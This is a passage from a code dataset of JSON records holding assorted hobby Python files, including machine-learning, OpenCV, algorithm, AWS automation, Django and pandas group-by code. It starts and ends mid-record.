->\\n\")\r\n logreg = LogisticRegression(C=10,solver=\"liblinear\")\r\n models={}\r\n avg_acc = 0\r\n model_acc = []\r\n for i in col:\r\n models[i] = logreg.fit(x_train, log_train[i])\r\n filename = \"model_\"+ str(i)\r\n pickle.dump(models[i], open(filename, 'wb'))\r\n y_pred = logreg.predict(x_test)\r\n acc = accuracy_score(log_test[i], y_pred)\r\n model_acc.append(\"{0:.2f}\".format(acc*100))\r\n c_matrix = confusion_matrix(log_test[i], y_pred)\r\n avg_acc = avg_acc + acc\r\n print(\"\\n Accuracy score for category \"+str(i)+\" using Logistic Regression: \"+str(100*acc)+\"%\")\r\n print(\"\\n Confusion Matrix for category \"+str(i)+\" using Logistic Regression: \")\r\n print(c_matrix)\r\n\r\n print(\"\\n Average Accuracy Score for Logistic Regression: \"+str(100*avg_acc/5)+\"\\n\")\r\n print(model_acc)\r\n model_acc = [float(i) for i in model_acc]\r\n fig = plt.figure()\r\n ax = fig.add_axes([0,0,1,1])\r\n ax.set_title('Comparison of testing accuracies for different labels')\r\n ax.set_xlabel('Labels')\r\n ax.set_ylabel('Model Accuracy')\r\n ax.set_xticklabels(col)\r\n ax.set_ylim([90,100])\r\n ax.bar(col,height = model_acc)\r\n for index,data in enumerate(model_acc):\r\n plt.text(x=index , y=data+0.2, s=f\"{data}\")\r\n path= join(dirname(realpath(__file__)), 'accuracy_score/')\r\n fig.savefig(path+\"graph.jpg\",bbox_inches = 'tight')\r\n print(\"Image saved!\")\r\n\r\ndef myinput(text):\r\n col = ['business','entertainment','politics','sport','tech']\r\n input_string=[text]\r\n vec = pickle.load(open('vect', 'rb'))\r\n input_data = vec.transform(input_string)\r\n result = []\r\n mymodels={}\r\n for i in col:\r\n filename = 'model_'+str(i)\r\n loaded_model = pickle.load(open(filename, 'rb'))\r\n result.append(loaded_model.predict_proba(input_data)[0,1])\r\n \r\n col_no = result.index(max(result))\r\n return col[col_no], result\r\n \r\n\r\n\r\n ","sub_path":"Text Category Classification/noGUI/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"492086081","text":"#! /usr/bin/python3\n\nstart_num = 10\nend_num = 32\n\nsquare = input(\"Enter number: \")\n\none_digit_squares = {\"1\" : 1, \"4\" : 2, \"9\" : 3, \"16\" : 4, \"25\" : 5, \"36\" : 6, \"49\" : 7, \"64\" : 8, \"81\" : 9}\n\nlast_digit = square[2:3]\nfirst_digit = square[0:1]\n\ncnt = 1\ncnt2 = 1\ncnt3 = cnt\nwhile cnt < 100:\n cnt2 = cnt2 + 2\n cnt += cnt2\n cnt3 = cnt\n cnt3 %= 10\n# prove theory of finding squareroot for 3 digit number in range\n# above\n","sub_path":"usefulprograms/findsquareroot.py","file_name":"findsquareroot.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"347394049","text":"import cv2\r\nimport numpy as np\r\nimport copy\r\nimport math\r\n\r\n# parameters\r\ncap_region_x_begin=0.5 # start point/total width\r\ncap_region_y_end=0.8 # start point/total width\r\nthreshold = 60 # BINARY threshold\r\nblurValue = 41 # GaussianBlur parameter\r\n# how much changes in background should be detect\r\nbgSubThreshold = 50\r\n\r\n# variables\r\nisBgCaptured = 0 # bool, whether the background captured\r\ntriggerSwitch = False # if true, keyborad simulator works\r\n\r\ndef putText(cnt):\r\n # Create a black image\r\n newimg = np.zeros((512, 512, 3), np.uint8)\r\n\r\n # Write some Text\r\n\r\n font = cv2.FONT_HERSHEY_SIMPLEX\r\n bottomLeftCornerOfText = (10, 500)\r\n fontScale = 1\r\n fontColor = (255, 255, 255)\r\n lineType = 2\r\n\r\n cv2.putText(newimg, str(cnt+1)+\" fingers\",\r\n bottomLeftCornerOfText,\r\n font,\r\n fontScale,\r\n fontColor,\r\n lineType)\r\n\r\n # Display the image\r\n cv2.imshow(\"fingers\", newimg)\r\n\r\n\r\n\r\ndef printThreshold(thr):\r\n print(\"! Changed threshold to \"+str(thr))\r\n\r\n\r\ndef removeBG(frame):\r\n fgmask = bgModel.apply(frame) #it now captures changes in already captured background\r\n # kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))\r\n # res = cv2.morphologyEx(fgmask, cv2.MORPH_OPEN, kernel)\r\n #cv2.imshow(\"fgmask\",fgmask)\r\n kernel = np.ones((3, 3), np.uint8)\r\n fgmask = cv2.erode(fgmask, kernel, iterations=1)\r\n #cv2.imshow(\"fgmask2\", fgmask)\r\n res = cv2.bitwise_and(frame, frame, mask=fgmask)\r\n #cv2.imshow(\"res\",res)\r\n return res\r\n\r\n\r\ndef calculateFingers(res,drawing): # -> finished bool, cnt: finger count\r\n # convexity defect\r\n hull = cv2.convexHull(res, returnPoints=False)\r\n # hull contains the indices of the points of the convexhull of \"res\"\r\n if len(hull) > 3:\r\n #It returns an array where each row contains these values\r\n # - [ start point, end point, farthest point, approximate distance to farthest point ].\r\n defects = cv2.convexityDefects(res, hull)\r\n if type(defects) != type(None): # avoid crashing. (BUG not found)\r\n cnt = 0\r\n for i in range(defects.shape[0]): # calculate the angle\r\n s, e, f, d = defects[i][0]\r\n start = tuple(res[s][0])\r\n end = tuple(res[e][0])\r\n far = tuple(res[f][0])\r\n #print(i,d)\r\n a = math.sqrt((end[0] - start[0]) ** 2 + (end[1] - start[1]) ** 2)\r\n b = math.sqrt((far[0] - start[0]) ** 2 + (far[1] - start[1]) ** 2)\r\n c = math.sqrt((end[0] - far[0]) ** 2 + (end[1] - far[1]) ** 2)\r\n angle = math.acos((b ** 2 + c ** 2 - a ** 2) / (2 * b * c)) # cosine theorem\r\n if angle <= (math.pi / 180)*100 and d > 16000: # angle less than 90 degree, treat as fingers\r\n cnt += 1\r\n cv2.circle(drawing, far, 8, [211, 84, 0], -1)\r\n return True, cnt\r\n return False, 0\r\n\r\n\r\n# Camera\r\ncamera = cv2.VideoCapture(0)\r\n# set brightness\r\ncamera.set(10,200)\r\ncv2.namedWindow('trackbar')\r\ncv2.createTrackbar('trh1', 'trackbar', threshold, 100, printThreshold)\r\n\r\n\r\nwhile camera.isOpened():\r\n _, frame = camera.read()\r\n #get threshold value\r\n threshold = cv2.getTrackbarPos('trh1', 'trackbar')\r\n # apply bilateralFilter for highly effective in noise removal while keeping edges sharp\r\n frame = cv2.bilateralFilter(frame, 5, 50, 100) # smoothing filter\r\n frame = cv2.flip(frame, 1) # flip the frame horizontally\r\n # frame.shape[1] width and frame.shape[0] height\r\n cv2.rectangle(frame, (int(cap_region_x_begin * frame.shape[1]), 0),\r\n (frame.shape[1], int(cap_region_y_end * frame.shape[0])), (255, 0, 0), 2) #RGB, width of border\r\n cv2.imshow('original', frame)\r\n\r\n # Main operation\r\n if isBgCaptured == 1: # this part wont run until background captured\r\n img = removeBG(frame)\r\n img = img[0:int(cap_region_y_end * frame.shape[0]),\r\n int(cap_region_x_begin * frame.shape[1]):frame.shape[1]] # clip the ROI\r\n cv2.imshow('mask', img)\r\n\r\n # convert the image into binary image\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n blur = cv2.GaussianBlur(gray, (blurValue, blurValue), 0)\r\n cv2.imshow('blur', blur)\r\n ret, thresh = cv2.threshold(blur, threshold, 255, cv2.THRESH_BINARY)\r\n cv2.imshow('ori', thresh)\r\n\r\n\r\n # get the coutours\r\n thresh1 = copy.deepcopy(thresh)\r\n contours, hierarchy = cv2.findContours(thresh1, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n length = len(contours)\r\n maxArea = -1\r\n if length > 0:\r\n for i in range(length): # find the biggest contour (according to area)\r\n temp = contours[i]\r\n area = cv2.contourArea(temp)\r\n if area > maxArea:\r\n maxArea = area\r\n ci = i\r\n\r\n res = contours[ci]\r\n #get extreme top point in image\r\n extTop = tuple(res[res[:, :, 1].argmin()][0])\r\n hull = cv2.convexHull(res)\r\n #for comletely black bacground or image, np,zeroes() is used\r\n drawing = np.zeros(img.shape, np.uint8)\r\n cv2.drawContours(drawing, [res], 0, (0, 255, 0), 2)\r\n cv2.drawContours(drawing, [hull], 0, (0, 0, 255), 3)\r\n cv2.circle(drawing, extTop, 8, (255, 255, 0), -1)\r\n # cv2.imshow(\"drwaing\",drawing)\r\n isFinishCal,cnt = calculateFingers(res,drawing)\r\n # if no fingers then cnt = -1\r\n if extTop[1] > 130:\r\n cnt = -1\r\n putText(cnt)\r\n if triggerSwitch is True:\r\n if isFinishCal is True and cnt <= 2:\r\n print (cnt)\r\n #app('System Events').keystroke(' ') # simulate pressing blank space\r\n\r\n cv2.imshow('output', drawing)\r\n\r\n # Keyboard OP\r\n # delay in next frame or fps = 1000/value given in waitKey\r\n k = cv2.waitKey(10)\r\n if k == 27: # press ESC to exit\r\n break\r\n elif k == ord('b'): # press 'b' to capture the background\r\n bgModel = cv2.BackgroundSubtractorMOG2(0, bgSubThreshold)\r\n isBgCaptured = 1\r\n print ('!!!Background Captured!!!')\r\n elif k == ord('r'): # press 'r' to reset the background\r\n bgModel = None\r\n triggerSwitch = False\r\n isBgCaptured = 0\r\n print ('!!!Reset BackGround!!!')\r\n elif k == ord('n'):\r\n triggerSwitch = True\r\n print ('!!!Trigger On!!!')\r\n\r\n# Release camera & end program\r\ncamera.release()\r\ncv2.destroyAllWindows()","sub_path":"Finger Counter/imagecv.py","file_name":"imagecv.py","file_ext":"py","file_size_in_byte":6699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"234726423","text":"#!/usr/bin/python\n\nimport sys\n\n\ndef making_change(amount, coins = [1, 5, 10, 25, 50], cache = {}):\n # get the all possible coins left\n uniqueCoins = len(coins)\n # coin value was higher than amount\n # so dont add anything to total\n if amount < 0: return 0\n # finished coin combination\n # so add 1 to total ways of making change for n $\n elif amount == 0: return 1\n # use cache to improve performance\n elif (amount, uniqueCoins) in cache: return cache[(amount, uniqueCoins)]\n # recursive loop\n else:\n total = 0\n for c in range(0, uniqueCoins):\n coin = coins[c]\n if coin > amount:\n continue\n else:\n result = making_change(amount - coin, coins[c:], cache)\n if result > 0:\n total += result\n cache[(amount, uniqueCoins)] = total\n return total\n\nif __name__ == \"__main__\":\n # Test our your implementation from the command line\n # with `python making_change.py [amount]` with different amounts\n if len(sys.argv) > 1:\n denominations = [1, 5, 10, 25, 50]\n amount = int(sys.argv[1])\n print(\"There are {ways} ways to make {amount} cents.\".format(ways=making_change(amount, denominations), amount=amount))\n else:\n print(\"Usage: making_change.py [amount]\")","sub_path":"making_change/making_change.py","file_name":"making_change.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"219094103","text":"import threading\nimport time\n\n\nlock_1 = threading.Lock()\nlock_2 = threading.Lock()\n\n\ndef func_1():\n print(\"函数1开始\")\n lock_1.acquire(timeout=4)\n print(\"1申请到了\")\n time.sleep(2)\n print(\"1等待\")\n\n rst = lock_2.acquire(timeout=2)\n if rst:\n print(\"1已经得到锁\")\n lock_2.release()\n print(\"1释放\")\n else:\n print(\"1没申请到\")\n\n lock_1.release()\n print(\"1释放了\")\n print(\"1 done\")\n\n\ndef func_2():\n print(\"函数2开始\")\n lock_2.acquire()\n print(\"2申请到了\")\n time.sleep(4)\n print(\"2等待\")\n\n lock_1.release()\n print(\"2释放了1\")\n lock_2.release()\n print(\"2释放了2\")\n\n print(\"2 done\")\n\nif __name__ == '__main__':\n print(\"主程序启动啦\")\n t1 = threading.Thread(target=func_1(), args=())\n t2 = threading.Thread(target=func_2(), args=())\n\n t1.start()\n t2.start()\n\n t1.join()\n t2.join()\n\n print(\"主程序结束啦\")","sub_path":"12-多线程/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"517194468","text":"class Solution(object):\n def topKFrequent(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: List[int]\n \"\"\"\n d = {}\n for num in nums:\n if num not in d:\n d[num] = 1\n else:\n d[num] += 1\n l = []\n for key, value in d.items():\n l.append((value, key))\n l = self.heapSort(l)\n res = []\n for i in range(k):\n res.append(l[len(d) - i - 1][1])\n return res\n \n def heapSort(self, arr):\n n = len(arr)\n first = int((n >> 1) - 1)\n for start in range(first, -1, -1):\n self.heapAdjust(arr, start, n - 1)\n for end in range(n - 1, 0, -1):\n arr[end], arr[0] = arr[0], arr[end]\n self.heapAdjust(arr, 0, end - 1)\n return arr\n \n def heapAdjust(self, arr, start, end):\n root = start\n while True:\n child = root * 2 + 1\n if child > end: break\n if child + 1 <= end and arr[child][0] < arr[child + 1][0]:\n child += 1\n if arr[root][0] < arr[child][0]:\n arr[root], arr[child] = arr[child], arr[root]\n root = child\n else:\n break\n","sub_path":"python/topKFrequentElements.py","file_name":"topKFrequentElements.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"295989308","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 30 14:15:51 2017\n\n@author: JoJo\n\"\"\"\n\nimport random\nimport prettytable\n\nclass Sackitem:\n def __init__ (self, weight, value):\n self.weight = weight\n self.value = value\n \nclass individual:\n def __init__(self, genome, ttlweight, ttlvalue, fitness):\n self.genome = genome\n self.mass = ttlweight\n self.value = ttlvalue\n self.fitness = fitness\n \n\n\ndef generatesack(nmbrofitems):\n \"\"\"This function generates a list of items with random weight/value pairs.\n \"\"\"\n while nmbrofitems != 0:\n newitem = Sackitem(random.randint(1,10),random.randint(1,20))\n itemlist.append(newitem)\n nmbrofitems -= 1\n return itemlist\n \ndef geninitialpopulation(counter,itemlist):\n itemlen = len(itemlist)\n population = []\n while counter != 0:\n newgene = []\n for index in range(itemlen):\n gene = random.randint(0,1)\n newgene.append(gene)\n population.append(newgene)\n counter -= 1\n population = populationconstruction(population)\n return population\n\ndef evolution(inipop):\n \"\"\"This function controlls the evolutionary cascade until after 25 consecutive generations, no new better individuals was generated\n in: initial population: list of individuals out: best individual after 25 generations with no change\n \"\"\"\n popmorph = inipop\n countgenerations = 0\n terminalcount = 0\n bestindiv = inipop[0]\n print(\"initializing with fitness: \",bestindiv.fitness)\n \n \n while terminalcount != 25:\n \n\n selection(popmorph)\n \n generationsbest = top_individual(popmorph)\n print(\"evaluating generation: \",countgenerations)\n countgenerations += 1\n \n \n if generationsbest.fitness > bestindiv.fitness:\n \n bestindiv = generationsbest\n print(\"Better individual found in generation\",countgenerations,\"! Top fitness now: \",bestindiv.fitness)\n terminalcount = 0\n else:\n terminalcount += 1\n\n \n \n popmorph = next_generation(popmorph)\n \n \n return(bestindiv, countgenerations)\n \n \ndef top_individual(sortedpop):\n \"\"\"input: sorted and cut list of individuals, output: best individual\"\"\"\n topobject = sortedpop[-1]\n return topobject\n\ndef selection(population):\n \"\"\"input: List of individuals, output: sorted and cut list of individuals\n \"\"\"\n sortedpop = sorted(population, key=lambda individual: individual.fitness)\n toplist = sortedpop[:len(sortedpop)//2]\n return toplist\n \ndef next_generation(population):\n \"\"\"input: last generation as list of individual objects, output: a new generation generated from combinging genes from the old one\"\"\"\n maxindex = len(population)\n currentgenomes = []\n newgeneration = []\n \n if len(population) %2 == 1:\n del population[0]\n \n for item in population:\n currentgenomes.append(item.genome)\n while maxindex != 0:\n\n \n getgene1 = random.randint(0,len(currentgenomes)-1)\n parentgene1 = currentgenomes[getgene1]\n del currentgenomes[getgene1]\n \n \n getgene2 = random.randint(0,len(currentgenomes)-1)\n parentgene2 = currentgenomes[getgene2]\n del currentgenomes[getgene2]\n \n cutpoint = random.randint(0,len(parentgene1)-1)\n \n child1 = parentgene1[:cutpoint] + parentgene2[cutpoint:]\n child2 = parentgene2[:cutpoint] + parentgene2[cutpoint:]\n \n \n newgeneration.append(child1)\n newgeneration.append(child2)\n maxindex -= 2\n mutate(newgeneration) \n final_generation = populationconstruction(newgeneration)\n return final_generation\n \ndef mutate(population):\n \"\"\"Input: List of binaries, output: list of binaries with mutated individual\"\"\"\n choosemutant = random.randrange(len(population))\n mutant = population[choosemutant]\n del population[choosemutant]\n choosegene2mutate = random.randrange(len(mutant))\n \n if mutant[choosegene2mutate] == 1:\n mutant[choosegene2mutate] = 0\n else:\n mutant[choosegene2mutate] = 1\n population.append(mutant)\n \n return population\n \n \ndef populationconstruction(listoflist):\n \"\"\"Input: List of Binary strings, output: new list of individual objects with fitness, weight, value\"\"\"\n returnfinishedpopulation = []\n for item in listoflist:\n attributelist = []\n totalweight = 0\n totalvalue = 0\n totalfitness = 0\n iterator = 0\n for index in item:\n if index == 1:\n attributelist.append(itemlist[iterator])\n iterator += 1\n else:\n iterator += 1\n \n for attributeindex in attributelist:\n totalweight = totalweight + attributeindex.weight\n totalvalue = totalvalue + attributeindex.value\n if totalweight > weightlimit:\n totalfitness = -1\n else:\n totalfitness = totalvalue\n newindividual = individual(item,totalweight,totalvalue,totalfitness)\n returnfinishedpopulation.append(newindividual)\n return returnfinishedpopulation\n \n \ndef initalize():\n \"\"\"This function requests user input to generate a high-number search space or a low-number search space and handles all console output\n \"\"\"\n global itemlist\n global limit\n global weightlimit\n global indivcount\n\n \n itemlist = []\n \n limit = 50000\n print(\"Initializing with \",limit,\" Items to choose from\")\n sack = generatesack(limit)\n \n weightlimit = 0\n for i in sack:\n weightlimit += i.weight\n weightlimit = weightlimit//2\n print(\"The napsack weightlimit is: \", weightlimit)\n \n indivcount = 200\n print(\"Initializing with \",indivcount,\" Individuals per generation\")\n takelist = geninitialpopulation(indivcount, sack)\n final_output = evolution(takelist)\n \n generations = final_output[1]\n final_output = final_output[0]\n \n print(\"\\n\")\n print(\"Best individual:\")\n bestindiv = prettytable.PrettyTable()\n bestindiv.field_names = [\"weight\",\"total value\",\"fitness\"]\n bestindiv.add_row([final_output.mass,final_output.value,final_output.fitness])\n print(bestindiv)\n print(\"Best solution acheived after \",generations, \" generations!\")\n print(\"Distance to weightlimit: \",weightlimit - final_output.mass)\n\n \n \n\n \ninitalize()","sub_path":"knapsack evolution.py","file_name":"knapsack evolution.py","file_ext":"py","file_size_in_byte":6558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"473372994","text":"## sudo pip install --user websocket-client\nfrom websocket import create_connection\nimport random\n\nclass mailbox(object):\n\t\"\"\"10 minute mailbox\"\"\"\n\tdef __init__(self):\n\t\tsuper(mailbox, self).__init__()\n\t\tself.ws = create_connection(\"wss://dropmail.me/websocket\")\n\t\tself.next = self.ws.recv\n\t\tself.close = self.ws.close\n\t\tself.email_hashes = []\n\t\temail_hash = self.next()[1:]\n\t\tself.email_hashes.append(email_hash)\n\t\tself.next()\n\n\t#adds a random email, returns its address\n\tdef addRandomEmail(self):\n\t\tself.ws.send(\"M\")\n\t\temail_hash = self.next()[1:]\n\t\tself.email_hashes.append(email_hash)\n\t\treturn email_hash.split(\":\")[0]\n\n\t#requires email and has in form name@domain:hash\n\tdef addEmail(self, email_hash):\n\t\tself.ws.send(\"R{}\".format(email_hash))\n\t\tself.email_hashes.append(self.next()[1:])\n\n\t#returns the list of emails present in the socket\n\tdef getEmails(self):\n\t\temails = []\n\t\tfor email_hash in self.email_hashes:\n\t\t\temails.append(email_hash.split(\":\")[0])\n\t\treturn emails\n\nif __name__ == '__main__':\n\tbox = mailbox()\n\t#adding emails\n\tprint(box.addRandomEmail())\n\tprint(box.email_hashes)\n\tprint(box.getEmails())\n\t#reading mail\n\tprint(box.next())","sub_path":"MinuteMail.py","file_name":"MinuteMail.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"109784858","text":"import boto3\nfrom botocore.exceptions import ClientError\n\n\ndef lambda_handler(event, context):\n instance_ids = get_instance_ids(event)\n if event['Action'] == 'StartInstance':\n result = start_instances(instance_ids)\n print(result)\n elif event['Action'] == 'StopInstance':\n result = stop_instances(instance_ids)\n print(result)\n\n\ndef get_instance_ids(event):\n if 'InstanceId' in event:\n return [event['InstanceId']]\n\n ec2 = boto3.client('ec2')\n\n if 'Environment' in event:\n result = ec2.describe_instances(Filters=[{\n \"Name\": \"tag:Environment\",\n \"Values\": [event['Environment']]\n }])\n instances = [i for r in result['Reservations'] for i in r['Instances']]\n return list(map(lambda i: i['InstanceId'], instances))\n\n try:\n lambda_config = ec2.get_function_configuration(\n FunctionName='Ec2CycleInstance'\n )\n return [lambda_config['Environment']['Variables']['InstanceId']]\n except ClientError as e:\n print(e)\n\n\ndef start_instances(instance_ids):\n ec2 = boto3.client('ec2')\n try:\n result = ec2.start_instances(InstanceIds=instance_ids)\n return result\n except ClientError as e:\n print(e)\n\n\ndef stop_instances(instance_ids):\n ec2 = boto3.client('ec2')\n try:\n result = ec2.stop_instances(InstanceIds=instance_ids)\n return result\n except ClientError as e:\n print(e)\n","sub_path":"blueprints/aws/codebuild/trigger/lambda/CodebuildTrigger.py","file_name":"CodebuildTrigger.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"4510514","text":"import boto3 \nimport os \nfrom dotenv import load_dotenv\n\nload_dotenv() # this loads the .env file with our credentials\n\nfile_name = 'data_files.zip' # name of the file to upload\nbucket_name = 'ramzi-final-project' # name of the bucket\n\ns3_client = boto3.client(\n 's3',\n aws_access_key_id=os.getenv('AWS_ACCESS_KEY_ID'),\n aws_secret_access_key=os.getenv('AWS_SECRET_ACCESS_KEY')\n)\n\nresponse = s3_client.upload_file(file_name, bucket_name, file_name)","sub_path":"airflow_final/boto_to_s3.py","file_name":"boto_to_s3.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"396456721","text":"from django import forms\nfrom django.utils import formats, six\nfrom django.utils.encoding import force_str, force_text\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.core.exceptions import ValidationError\nfrom django.core import validators\n\nimport datetime\n\n\nclass DateRangeField(forms.Field):\n \"\"\"\n Custom form field for saving date range two separate fields start_date\n and end_date in model\n \"\"\"\n input_formats = formats.get_format_lazy('DATE_INPUT_FORMATS')\n default_error_messages = {\n 'invalid': _('Enter a valid date.'),\n }\n\n def to_python(self, value):\n valid_data = []\n if value in validators.EMPTY_VALUES:\n return value\n\n dates = value.split(' - ')\n if len(dates) != 2:\n raise ValidationError(_('Wrong format'))\n\n # Try to coerce the value to unicode.\n unicode_value1 = force_text(dates[0], strings_only=True)\n unicode_value2 = force_text(dates[1], strings_only=True)\n\n if isinstance(unicode_value1, six.text_type):\n value1 = unicode_value1.strip()\n if isinstance(unicode_value2, six.text_type):\n value2 = unicode_value2.strip()\n\n # If unicode, try to strptime against each input format.\n if isinstance(value1, six.text_type):\n for format in self.input_formats:\n try:\n value1 = self.strptime(value1, format)\n except (ValueError, TypeError):\n continue\n if isinstance(value2, six.text_type):\n for format in self.input_formats:\n try:\n value2 = self.strptime(value2, format)\n except (ValueError, TypeError):\n continue\n\n if value1 in self.empty_values:\n return None\n if isinstance(value1, datetime.datetime):\n valid_data.append(value1.date())\n if isinstance(value1, datetime.date):\n valid_data.append(value1)\n\n if value2 in self.empty_values:\n return None\n if isinstance(value2, datetime.datetime):\n valid_data.append(value2.date())\n if isinstance(value2, datetime.date):\n valid_data.append(value2)\n\n if len(valid_data) != 2:\n raise ValidationError(self.error_messages['invalid'], code='invalid')\n\n return super(DateRangeField, self).to_python(valid_data)\n\n def strptime(self, value, format):\n return datetime.datetime.strptime(force_str(value), format).date()\n","sub_path":"apps/accounts/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"634380857","text":"from mod_base import *\n\n\nclass Config(Command):\n def run(self, app, editor):\n path = app.config.path()\n f = app.file_is_open(path)\n if f:\n app.switch_to_file(app.get_file_index(f))\n else:\n if not app.open_file(path):\n app.new_file(path)\n app.switch_to_file(app.last_file_index())\n\nmodule = {\n \"class\": Config,\n \"name\": \"config\",\n}\n","sub_path":"modules/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"348828658","text":"from siuba.spec.series import spec\nfrom siuba.siu import CallTreeLocal, FunctionLookupError\n\nfrom siuba.experimental.pd_groups.translate import SeriesGroupBy, GroupByAgg, GROUP_METHODS\n\n\n# TODO: make into CallTreeLocal factory function\n\nout = {}\ncall_props = set()\nfor name, entry in spec.items():\n #if entry['result']['type']: continue\n kind = entry['action'].get('kind') or entry['action'].get('status')\n key = (kind.title(), entry['action']['data_arity'])\n\n # add properties like df.dtype, so we know they are method calls\n if entry['is_property'] and not entry['accessor']:\n call_props.add(name)\n\n\n meth = GROUP_METHODS[key](\n name = name.split('.')[-1],\n is_property = entry['is_property'],\n accessor = entry['accessor']\n )\n\n # TODO: returning this exception class from group methods is weird, but I \n # think also used in tests\n if meth is NotImplementedError:\n continue\n\n out[name] = meth\n\ncall_listener = CallTreeLocal(\n out,\n call_sub_attr = ('str', 'dt', 'cat', 'sparse'),\n chain_sub_attr = True,\n dispatch_cls = GroupByAgg,\n result_cls = SeriesGroupBy,\n call_props = call_props\n )\n\n\n# Fast group by verbs =========================================================\n\nfrom siuba.siu import Call\nfrom siuba.dply.verbs import mutate, filter, summarize, singledispatch2, DataFrameGroupBy, _regroup\nfrom pandas.core.dtypes.inference import is_scalar\nimport warnings\n\ndef fallback_warning(expr, reason):\n warnings.warn(\n \"The expression below cannot be executed quickly. \"\n \"Using the slow (but general) pandas apply method.\"\n \"\\n\\nExpression: {}\\nReason: {}\"\n .format(expr, reason)\n )\n\n\ndef grouped_eval(__data, expr, require_agg = False):\n if is_scalar(expr):\n return expr\n \n if isinstance(expr, Call):\n try:\n call = call_listener.enter(expr)\n except FunctionLookupError as e:\n fallback_warning(expr, str(e))\n call = expr\n\n #\n grouped_res = call(__data)\n\n if isinstance(grouped_res, GroupByAgg):\n # TODO: may want to validate its grouper\n if require_agg:\n # need an agg, got an agg. we are done.\n if not grouped_res._orig_grouper is __data.grouper:\n raise ValueError(\"Incompatible groupers\")\n return grouped_res\n else:\n # broadcast from aggregate to original length (like transform)\n return grouped_res._broadcast_agg_result()\n elif isinstance(grouped_res, SeriesGroupBy) and not require_agg:\n # TODO: may want to validate its grouper\n return grouped_res.obj\n else:\n # can happen right now if user selects, e.g., a property of the\n # groupby object, like .dtype, which returns a single value\n # in the future, could restrict set of operations user could perform\n raise ValueError(\"Result must be subclass of SeriesGroupBy\")\n\n raise ValueError(\"Grouped expressions must be a siu expression or scalar\")\n\n\n\n# Fast mutate ----\n\ndef _transform_args(args):\n out = []\n for expr in args:\n if is_scalar(expr):\n out.append(expr)\n elif isinstance(expr, Call):\n try:\n call = call_listener.enter(expr)\n out.append(call)\n except FunctionLookupError as e:\n fallback_warning(expr, str(e))\n return None\n elif callable(expr):\n return None\n\n return out\n\n@singledispatch2(DataFrameGroupBy)\ndef fast_mutate(__data, **kwargs):\n \"\"\"Warning: this function is experimental\"\"\"\n\n # transform call trees, potentially bail out to slow method --------\n new_vals = _transform_args(kwargs.values())\n\n if new_vals is None:\n return mutate(__data, **kwargs)\n\n\n # perform fast method ----\n out = __data.obj.copy()\n groupings = __data.grouper.groupings\n\n\n for name, expr in zip(kwargs, new_vals):\n res = grouped_eval(__data, expr)\n out[name] = res\n\n return out.groupby(groupings)\n\n\n@fast_mutate.register(object)\ndef _fast_mutate_default(__data, **kwargs):\n # TODO: had to register object second, since singledispatch2 sets object dispatch\n # to be a pipe (e.g. unknown types become a pipe by default)\n # by default dispatch to regular mutate\n f = mutate.registry[type(__data)]\n return f(__data, **kwargs)\n\n\n# Fast filter ----\n\n@singledispatch2(DataFrameGroupBy)\ndef fast_filter(__data, *args):\n \"\"\"Warning: this function is experimental\"\"\"\n\n # transform call trees, potentially bail out to slow method --------\n new_vals = _transform_args(args)\n\n if new_vals is None:\n return filter(__data, *args)\n\n # perform fast method ----\n out = []\n groupings = __data.grouper.groupings\n\n for expr in args:\n res = grouped_eval(__data, expr)\n out.append(res)\n\n filter_df = filter.registry[__data.obj.__class__]\n\n df_result = filter_df(__data.obj, *out)\n\n # TODO: research how to efficiently & robustly subset groupings\n group_names = [ping.name for ping in groupings]\n return df_result.groupby(group_names)\n\n\n@fast_filter.register(object)\ndef _fast_filter_default(__data, *args, **kwargs):\n # TODO: had to register object second, since singledispatch2 sets object dispatch\n # to be a pipe (e.g. unknown types become a pipe by default)\n # by default dispatch to regular mutate\n f = filter.registry[type(__data)]\n return f(__data, *args, **kwargs)\n\n\n# Fast summarize ----\n\n@singledispatch2(DataFrameGroupBy)\ndef fast_summarize(__data, **kwargs):\n \"\"\"Warning: this function is experimental\"\"\"\n\n # transform call trees, potentially bail out to slow method --------\n new_vals = _transform_args(kwargs.values())\n\n if new_vals is None:\n return summarize(__data, **kwargs)\n\n # perform fast method ----\n groupings = __data.grouper.groupings\n\n # TODO: better way of getting this frame?\n out = __data.grouper.result_index.to_frame()\n \n for name, expr in kwargs.items():\n # special case: set scalars directly\n res = grouped_eval(__data, expr, require_agg = True)\n\n if isinstance(res, GroupByAgg):\n # TODO: would be faster to check that res has matching grouper, since\n # here it goes through the work of matching up indexes (which if\n # the groupers match are identical)\n out[name] = res.obj\n\n # otherwise, assign like a 